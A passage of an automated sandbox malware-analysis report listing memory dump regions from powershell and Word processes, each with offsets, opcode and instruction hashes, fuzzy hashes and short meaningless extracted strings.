                                                                  • Snapshot File: hcaresult_16_2_7ffaac540000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: be606a0c67d03833e3b8d0585119b2d3077f9cd2e9e5e1071a7500576823d1a4
                                                                  • Instruction ID: 4c80affbc021e3bc9ee046538abf08f105416144178df8d8eda99d11c2bc8ab3
                                                                  • Opcode Fuzzy Hash: be606a0c67d03833e3b8d0585119b2d3077f9cd2e9e5e1071a7500576823d1a4
                                                                  • Instruction Fuzzy Hash: 082103629CEA87CFF3A9CB18C65117466D7EF52210B5980B9E00FC7592CF28DC089381
                                                                  Memory Dump Source
                                                                  • Source File: 00000010.00000002.1838779115.00007FFAAC540000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC540000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_16_2_7ffaac540000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: b997c38253a6be13a2971c78033f23916f82fea05e4b44ce81749ec461c271c9
                                                                  • Instruction ID: ebf088122d21111136fe2bfe0bfadc39970f14baa3b5d3ecb7e1697b83f5d034
                                                                  • Opcode Fuzzy Hash: b997c38253a6be13a2971c78033f23916f82fea05e4b44ce81749ec461c271c9
                                                                  • Instruction Fuzzy Hash: 4C1123729CE9468FF7A4D728C45457877E6EF0162075880BAE01FC3192DF18EC488381
                                                                  Memory Dump Source
                                                                  • Source File: 00000010.00000002.1834912402.00007FFAAC470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC470000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_16_2_7ffaac470000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                                  • Instruction ID: bfbf926510f2c94275b7c70522523e97f2c3e2f6a14ef67711fcb719095a95a3
                                                                  • Opcode Fuzzy Hash: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                                  • Instruction Fuzzy Hash: 4201677111CB0C8FD744EF0CE451AA5B7E0FB95364F10056DE58AC36A1DA36E892CB45
                                                                  Memory Dump Source
                                                                  • Source File: 00000010.00000002.1834912402.00007FFAAC475000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC475000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_16_2_7ffaac475000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: e5880c9eab0093c5fa87893d468456513fd9e6b9d3dc2177822c0ee011d720fa
                                                                  • Instruction ID: 9916a7ddf505a02e079d9a9a61ac8eab84a118cf6ac3029c20251045cea94f7f
                                                                  • Opcode Fuzzy Hash: e5880c9eab0093c5fa87893d468456513fd9e6b9d3dc2177822c0ee011d720fa
                                                                  • Instruction Fuzzy Hash: AEF0F676519B8C8FE785DB1CD8690E97F90FF66215B0402A7E54CC7162DA2188488BC1
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000010.00000002.1834912402.00007FFAAC475000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC475000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_16_2_7ffaac475000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: M_^$M_^$M_^$M_^$M_^
                                                                  • API String ID: 0-2396788759
                                                                  • Opcode ID: f73e6d212c2c3b84914c9cd30220566246546d8ae3423f36caa013e815f6c908
                                                                  • Instruction ID: 6ff40a8d894ed649ea34f11fc0baada8f9415a4c8a59b0fe05ec21d8234905b0
                                                                  • Opcode Fuzzy Hash: f73e6d212c2c3b84914c9cd30220566246546d8ae3423f36caa013e815f6c908
                                                                  • Instruction Fuzzy Hash: E05197F390E7D38FF35A4368586A1A57FE0EF63218B4942F6C08C9B5D3ED19580A42C6
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000010.00000002.1834912402.00007FFAAC475000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC475000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_16_2_7ffaac475000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: M_^5$M_^8$M_^F$M_^I$M_^K
                                                                  • API String ID: 0-2170160206
                                                                  • Opcode ID: 467a3bf947d0bd8b3431e84963978ea4daa9a6ed38a982528ffad7b655969975
                                                                  • Instruction ID: 8478f255d057a389099621f0292da76d3ec907d011dccd31c5857745d07efe61
                                                                  • Opcode Fuzzy Hash: 467a3bf947d0bd8b3431e84963978ea4daa9a6ed38a982528ffad7b655969975
                                                                  • Instruction Fuzzy Hash: 872125B7794165CE92013B7DE829DEC77C4CF9427538987F2D199CF293EC18708A8A84
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000010.00000002.1834912402.00007FFAAC475000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC475000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_16_2_7ffaac475000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: M_^$M_^$M_^$M_^
                                                                  • API String ID: 0-1397233021
                                                                  • Opcode ID: 725ed8ea2dd6560fbfea38d3f85c98c452e4cbbe3b83735c8675aa3da08cf212
                                                                  • Instruction ID: 384023d38fc4b36389b185f1f0fd98763c989f89afd2ea3ffcbc2cdb4193cdcd
                                                                  • Opcode Fuzzy Hash: 725ed8ea2dd6560fbfea38d3f85c98c452e4cbbe3b83735c8675aa3da08cf212
                                                                  • Instruction Fuzzy Hash: 7A3180F3A0ABD3DBF65A0318586A0A67FD4EF6361C34D43F6C4989A583FD15580B42C5
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000014.00000002.1877481901.00007FFAAC480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC480000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_20_2_7ffaac480000_Word.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 6$6$6$6$"r
                                                                  • API String ID: 0-3979851792
                                                                  • Opcode ID: fe33f0c8c473a2be2d9394182bab24f5ae435b06600a3c288ae9f84da841b225
                                                                  • Instruction ID: c57bbc8b74cb7c3015e30a13758e6431762ea3b5758ff24ae424973b5b9a2094
                                                                  • Opcode Fuzzy Hash: fe33f0c8c473a2be2d9394182bab24f5ae435b06600a3c288ae9f84da841b225
                                                                  • Instruction Fuzzy Hash: 2A320460B2DA498FF798EB3CC459B79B7D2EF99305F40457AD44EC3296CE28A84187C1
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000014.00000002.1877481901.00007FFAAC480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC480000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_20_2_7ffaac480000_Word.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 6$6$6$6$"r
                                                                  • API String ID: 0-3979851792
                                                                  • Opcode ID: b9373260ed64eeeffa53811d0117823164abb1025532ce9df279b505595ad3c1
                                                                  • Instruction ID: 857e94c638506625582a882c019f5ac35b023c1fa68f6c14d9773a24c4ff9f30
                                                                  • Opcode Fuzzy Hash: b9373260ed64eeeffa53811d0117823164abb1025532ce9df279b505595ad3c1
                                                                  • Instruction Fuzzy Hash: D022F461A2DA498FF798F738C459BB97BD2EF89305F40457AD04EC32D6DE28A80587C1
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000014.00000002.1877481901.00007FFAAC480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC480000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_20_2_7ffaac480000_Word.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: r6
                                                                  • API String ID: 0-2984296541
                                                                  • Opcode ID: 225e5a56161c844f6effea8a22458ffd06e1d374090e3ce6c5d4f468ba1b438e
                                                                  • Instruction ID: e1e61aa98cb435ce6e110c85815d30bd239a2d317fdab16e7af5c67b6db393ff
                                                                  • Opcode Fuzzy Hash: 225e5a56161c844f6effea8a22458ffd06e1d374090e3ce6c5d4f468ba1b438e
                                                                  • Instruction Fuzzy Hash: C151655061E6C94FE396A77888686767FE5DF97229B1801FBE0CDC71E3DD08480AC382
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000014.00000002.1877481901.00007FFAAC480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC480000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_20_2_7ffaac480000_Word.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 9M_^
                                                                  • API String ID: 0-1708477388
                                                                  • Opcode ID: 360eaa90c18568c77c111aa4be9b187a1aff14a86244858dc8c4b6ef456f0eb8
                                                                  • Instruction ID: 19fc1f7bb01b382d1f30451d3c044a608cee2823554b021da491e5b4a2d2d236
                                                                  • Opcode Fuzzy Hash: 360eaa90c18568c77c111aa4be9b187a1aff14a86244858dc8c4b6ef456f0eb8
                                                                  • Instruction Fuzzy Hash: F8617C66A8951ECBE740BB7CE4199FC7BD0EF85329B048276D00DC7397CD28648587D4
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000014.00000002.1877481901.00007FFAAC480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC480000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_20_2_7ffaac480000_Word.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 4M_^
                                                                  • API String ID: 0-2545914641
                                                                  • Opcode ID: 06ee70e90113f9bc86ae77c0c61bc77c91f3ccc45045709143a4320b96d9e7a6
                                                                  • Instruction ID: 20c7bb994dcb397b2d50092b4dc0dec57d2c243a2173d59ced953d4a918aef86
                                                                  • Opcode Fuzzy Hash: 06ee70e90113f9bc86ae77c0c61bc77c91f3ccc45045709143a4320b96d9e7a6
                                                                  • Instruction Fuzzy Hash: 0B513861A1D6860FE396A73CD81A6B53FD5DF87224B0981FBD08DC72A3DC1C9C468392
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000014.00000002.1877481901.00007FFAAC480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC480000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_20_2_7ffaac480000_Word.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: <M_^
                                                                  • API String ID: 0-1376500734
                                                                  • Opcode ID: cdbec4b82b9dfb8f0865ea2184265b41c52baac5fde76c9695635b80373bc169
                                                                  • Instruction ID: a23d1d2bdad5cf6db20ddf71b81063c9f8433ab8839b51cf3bffd4e5732bd309
                                                                  • Opcode Fuzzy Hash: cdbec4b82b9dfb8f0865ea2184265b41c52baac5fde76c9695635b80373bc169
                                                                  • Instruction Fuzzy Hash: 85415635A8D68D8FE341FB3CD4A5DF87BA1EF8120A74481B6C04EC73A7DD2864458791
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000014.00000002.1877481901.00007FFAAC480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC480000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_20_2_7ffaac480000_Word.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: r6
                                                                  • API String ID: 0-2984296541
                                                                  • Opcode ID: 8ab3eb41fd9f661a628e5d3307e6c837bc25376d54150a51938608cb9db634bb
                                                                  • Instruction ID: 481d9087bd9b8400c1d15e3b15d8726301caff17fcf1c9dd432eaea826aa7740
                                                                  • Opcode Fuzzy Hash: 8ab3eb41fd9f661a628e5d3307e6c837bc25376d54150a51938608cb9db634bb
                                                                  • Instruction Fuzzy Hash: 0731D561B1C9484FE798E73CD85AB79B6C6EB99315F0406BEE44EC32A3DD649C418381
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000014.00000002.1877481901.00007FFAAC480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC480000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_20_2_7ffaac480000_Word.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 6
                                                                  • API String ID: 0-1452363761
                                                                  • Opcode ID: 61e1d6c053de0a654140ccc1d1c270de400e7c7cd1f87705c8bd0619e6cdb409
                                                                  • Instruction ID: d925ef1c1f1962354a39592f4bf7e289a5ec7473d48ea146bb6ee445eedb44dd
                                                                  • Opcode Fuzzy Hash: 61e1d6c053de0a654140ccc1d1c270de400e7c7cd1f87705c8bd0619e6cdb409
                                                                  • Instruction Fuzzy Hash: 7C31F851B18A494FF784B7BC981E7BDBBD5EF99310F1042B6E00DC3292DD289D418791
                                                                  Memory Dump Source
                                                                  • Source File: 00000014.00000002.1877481901.00007FFAAC480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC480000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_20_2_7ffaac480000_Word.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 7d7bb451504e22872390a05c5d24c2f6576e3f62c11813009fb9697cfdaf6c7d
                                                                  • Instruction ID: a3deb5a7bf525d9c2ac6ac9b546a00c6c643f9fe3d610c94d150802e7d91acde
                                                                  • Opcode Fuzzy Hash: 7d7bb451504e22872390a05c5d24c2f6576e3f62c11813009fb9697cfdaf6c7d
                                                                  • Instruction Fuzzy Hash: 0C41C36798D2565BE641BB7CF4798F97BE0DF42239B088277D18DC92A3DC1870894BC8
                                                                  Memory Dump Source
                                                                  • Source File: 00000014.00000002.1877481901.00007FFAAC480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC480000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_20_2_7ffaac480000_Word.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 406cda930a84efce5726b30b745397fa8d987836fa0552250fcc5245649f00b7
                                                                  • Instruction ID: eb2618dc7299e9d5bc9508123d30fca30ebe653abae5835cf82428a23643aa50
                                                                  • Opcode Fuzzy Hash: 406cda930a84efce5726b30b745397fa8d987836fa0552250fcc5245649f00b7
                                                                  • Instruction Fuzzy Hash: A321F86294E7894FE342E77CD8798F97FB0AF43214B0882B7D099DA193DC18644987D5
                                                                  Memory Dump Source
                                                                  • Source File: 00000014.00000002.1877481901.00007FFAAC480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC480000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_20_2_7ffaac480000_Word.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 3ae1bcc552dc7ef3e2f6a6461d917615822380ca54260e43217f82089893f6b9
                                                                  • Instruction ID: ef0b1cd32b0e07e33f0f60fb9948ff4a036da0ff1dde877f7e10a05f59bda839
                                                                  • Opcode Fuzzy Hash: 3ae1bcc552dc7ef3e2f6a6461d917615822380ca54260e43217f82089893f6b9
                                                                  • Instruction Fuzzy Hash: 74A1286674956E8BD700BB7CE8559FD7BA0EF86335B0482B7C14DCA297CD24608ACBD0
                                                                  Memory Dump Source
                                                                  • Source File: 00000014.00000002.1877481901.00007FFAAC480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC480000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_20_2_7ffaac480000_Word.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 6735c1a4ff64549613d3531793249f35db3399f3260f0a800e66c870e03a32b7
                                                                  • Instruction ID: 0ec0760a0fe907b4f4373a0ae10319526672113c0b7ee50f09ff38d433d45e7a
                                                                  • Opcode Fuzzy Hash: 6735c1a4ff64549613d3531793249f35db3399f3260f0a800e66c870e03a32b7
                                                                  • Instruction Fuzzy Hash: 7F914966B8955E8AD700BB7CF8199FD7B90EF85336B0482B7C04DCA297CD246086C7D0
                                                                  Memory Dump Source
                                                                  • Source File: 00000014.00000002.1877481901.00007FFAAC480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC480000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_20_2_7ffaac480000_Word.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: af1f00e7b2fd517f9403985e9e7c5ad291dbb56cab6481748f0e74788fe6247a
                                                                  • Instruction ID: d18987ad3fb5e82c27b059a9b51ed08318fa7efbf42fc84be7c9a216de119a38
                                                                  • Opcode Fuzzy Hash: af1f00e7b2fd517f9403985e9e7c5ad291dbb56cab6481748f0e74788fe6247a
                                                                  • Instruction Fuzzy Hash: 97815966B8951E8AE740BB7CE8199FD7BA0EF85335B048277D04EC6297CD246086CBD0
                                                                  Memory Dump Source
                                                                  • Source File: 00000014.00000002.1877481901.00007FFAAC480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC480000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_20_2_7ffaac480000_Word.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: bde91efd7c3932b3df78a68d0cbe05cd74ca6df94672c3bd3da548f85313bb4e
                                                                  • Instruction ID: 3b8997795783e2c05e57823200ecf5cd3f9e2ff061029e9ab2569aab4091bbb5
                                                                  • Opcode Fuzzy Hash: bde91efd7c3932b3df78a68d0cbe05cd74ca6df94672c3bd3da548f85313bb4e
                                                                  • Instruction Fuzzy Hash: 72814A66B8951E8AE740BB7CF8199FD7BA1EF85335B048277D04EC6297CD246086CBD0
                                                                  Memory Dump Source
                                                                  • Source File: 00000014.00000002.1877481901.00007FFAAC480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC480000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_20_2_7ffaac480000_Word.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: d0d299f349ec32443167998cda91d3bbd13c16960a382ef1c6d6c41a4a0dc7b1
                                                                  • Instruction ID: e625deffca02084b58f28a3e8748e56646313bd58cb9eaf3a30ee00e91522898
                                                                  • Opcode Fuzzy Hash: d0d299f349ec32443167998cda91d3bbd13c16960a382ef1c6d6c41a4a0dc7b1
                                                                  • Instruction Fuzzy Hash: C4717966B8951E8AE740BB7CE8199FD7BA1EF85335B048277D04EC7293CD246086CBD0
                                                                  Memory Dump Source
                                                                  • Source File: 00000014.00000002.1877481901.00007FFAAC480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC480000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_20_2_7ffaac480000_Word.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 7f90970c517bb79634baa3b5c4bc8186114696cf3f640c7ebcd8fd10dae11142
                                                                  • Instruction ID: 8ffd070b5113a25676895fd0142777fe10651b2cc05a542c879fb912f6627bb7
                                                                  • Opcode Fuzzy Hash: 7f90970c517bb79634baa3b5c4bc8186114696cf3f640c7ebcd8fd10dae11142
                                                                  • Instruction Fuzzy Hash: 4C517761A8D6C99FE341EB3CC4A49F97FE0EF4120974480B6D08ECB3ABDD2894498791
                                                                  Memory Dump Source
                                                                  • Source File: 00000014.00000002.1877481901.00007FFAAC480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC480000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_20_2_7ffaac480000_Word.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: eb72a3b4f350c47b79691a9968152a00a3e243d41a885ac28352b87c1338f467
                                                                  • Instruction ID: 99859ceb5d14b8b335240bb444794f3bbaf57ef814fa9328af571c6808e2208c
                                                                  • Opcode Fuzzy Hash: eb72a3b4f350c47b79691a9968152a00a3e243d41a885ac28352b87c1338f467
                                                                  • Instruction Fuzzy Hash: 5241C460A18A4D8FEB84EB78C855AF97BE2FF89305F544575D00AD3296CD289845C790
                                                                  Memory Dump Source
                                                                  • Source File: 00000014.00000002.1877481901.00007FFAAC480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC480000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_20_2_7ffaac480000_Word.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: e700d33157049264a1cc1bcf065ad3ed4ad0b1421bade58a009d2407da13e9d9
                                                                  • Instruction ID: acac22c0599a11619b4f70f41b6cf073b54970f2cf225a8172cc49165308b73a
                                                                  • Opcode Fuzzy Hash: e700d33157049264a1cc1bcf065ad3ed4ad0b1421bade58a009d2407da13e9d9
                                                                  • Instruction Fuzzy Hash: B821E56499C6CD9FE389FB3CC4A5DA97FB2AF85206B9080A5D44FC339BDE285900C751
                                                                  Memory Dump Source
                                                                  • Source File: 00000014.00000002.1877481901.00007FFAAC480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC480000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_20_2_7ffaac480000_Word.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 44a1a7aede486e3185a42d7ba019d2fff97effdc92111c200e0447f7a8625d5d
                                                                  • Instruction ID: 3520917ce46ccc291b6c16263c6df7ece33ad614631e1892404189d6dce7dd27
                                                                  • Opcode Fuzzy Hash: 44a1a7aede486e3185a42d7ba019d2fff97effdc92111c200e0447f7a8625d5d
                                                                  • Instruction Fuzzy Hash: 0401491490D7C58FF795A7384C598727FE0DFA2295B0804AAE8DDC61D7D808AA8883D6
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000017.00000002.1999446035.00007FFAAC470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC470000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_23_2_7ffaac470000_Word.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 6$6$6$6$"r
                                                                  • API String ID: 0-3979851792
                                                                  • Opcode ID: ab7545efbdb8c5b193bbc35a606ce1ef119c70c60342c2bd6a4309286b9340d4
                                                                  • Instruction ID: d209da253391e1654d93a5d112ef6342320062561115d11058be9cf66614cee9
                                                                  • Opcode Fuzzy Hash: ab7545efbdb8c5b193bbc35a606ce1ef119c70c60342c2bd6a4309286b9340d4
                                                                  • Instruction Fuzzy Hash: 55320861B29A558FF798EB38C45AA79BBD2FF99304F448579D00EC3292DD28EC018781
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000017.00000002.1999446035.00007FFAAC470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC470000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_23_2_7ffaac470000_Word.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 6$6$6$6$"r
                                                                  • API String ID: 0-3979851792
                                                                  • Opcode ID: e3d55b9585f438c42d3945ee270c277f95a32fcff06025bb1cfaa1e9486361aa
                                                                  • Instruction ID: dfd8d3bb2a62e1410031ed75ff6fd34b0073f70460c661c408d4ccd92e1f577f
                                                                  • Opcode Fuzzy Hash: e3d55b9585f438c42d3945ee270c277f95a32fcff06025bb1cfaa1e9486361aa
                                                                  • Instruction Fuzzy Hash: E922E7A1A19A558FF798E738C45EAB97BD1EF99304F404579D00EC32D3ED28EC458781
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000017.00000002.1999446035.00007FFAAC470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC470000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_23_2_7ffaac470000_Word.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: r6
                                                                  • API String ID: 0-2984296541
                                                                  • Opcode ID: ab54c9ea2d5eb2e731440ec4907c03f2c27b0f80630a8a2a1426cc183964abb3
                                                                  • Instruction ID: 20932872ca3f5360465dc33f2b6abe4b199e0ad964f708bf6d6310a4e7418bdc
                                                                  • Opcode Fuzzy Hash: ab54c9ea2d5eb2e731440ec4907c03f2c27b0f80630a8a2a1426cc183964abb3
                                                                  • Instruction Fuzzy Hash: 1C51445161E6C58FE396A77898686757FE5EF87229B0804FBE0CDC71A3DD08480AC382
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000017.00000002.1999446035.00007FFAAC470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC470000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_23_2_7ffaac470000_Word.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 9N_^
                                                                  • API String ID: 0-1737749909
                                                                  • Opcode ID: ee4449db4616c1e74a6ed83b78ac0e2df47b281e0c4c56f84f1ef10a9816b072
                                                                  • Instruction ID: 02d56e6c9527dde49dac975b5f9faf34bbaad2923d387b16bfd1c154de9192f5
                                                                  • Opcode Fuzzy Hash: ee4449db4616c1e74a6ed83b78ac0e2df47b281e0c4c56f84f1ef10a9816b072
                                                                  • Instruction Fuzzy Hash: 1E613762A895268BE741BBBCE4199FC7FE0EF85325B148536D10EC7393CD28B48687D4
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000017.00000002.1999446035.00007FFAAC470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC470000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_23_2_7ffaac470000_Word.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 4N_^
                                                                  • API String ID: 0-2516135240
                                                                  • Opcode ID: 1be9b772d3e1acc7b9421c03687c879d9540b4f1c32e0aa6cb69fa63d5983343
                                                                  • Instruction ID: defc01a84d85463c505bb313a765b60194197fbcdd5d1860a8f6af0b7ea5902c
                                                                  • Opcode Fuzzy Hash: 1be9b772d3e1acc7b9421c03687c879d9540b4f1c32e0aa6cb69fa63d5983343
                                                                  • Instruction Fuzzy Hash: DB512961A4E6960FE396A73CD81A6B57FD5DF87220B0940FBD08DC72A3DC1C9C468392
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000017.00000002.1999446035.00007FFAAC470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC470000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_23_2_7ffaac470000_Word.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: <N_^
                                                                  • API String ID: 0-1347224999
                                                                  • Opcode ID: afde292646a021cbb41f14d237b3260d255adb800dce5b0cc0eae54a3028abcf
                                                                  • Instruction ID: 006c2fb84c272befb5ec80027c3af4e4f6750836cf89a12b7076b433f48e4c02
                                                                  • Opcode Fuzzy Hash: afde292646a021cbb41f14d237b3260d255adb800dce5b0cc0eae54a3028abcf
                                                                  • Instruction Fuzzy Hash: 53416BB2A8D6558FF302E77CE4A9DF93FA0EF8520474084B6C04BC73A7ED28A4458781
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000017.00000002.1999446035.00007FFAAC470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC470000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_23_2_7ffaac470000_Word.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: r6
                                                                  • API String ID: 0-2984296541
                                                                  • Opcode ID: 23a21ef4a70a4d05b9073f8593a9a643c06deb55e821fe0dd5ef64105b7f9934
                                                                  • Instruction ID: 19a2f159780c9e60433e66da09c357497e6277505675fbf84e5f682afd6b7877
                                                                  • Opcode Fuzzy Hash: 23a21ef4a70a4d05b9073f8593a9a643c06deb55e821fe0dd5ef64105b7f9934
                                                                  • Instruction Fuzzy Hash: D831F561B1C9584FE798E77CD85AB78B6C6EB99315F0405BEE04EC32A3DD249C418381
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000017.00000002.1999446035.00007FFAAC470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC470000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_23_2_7ffaac470000_Word.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 6
                                                                  • API String ID: 0-1452363761
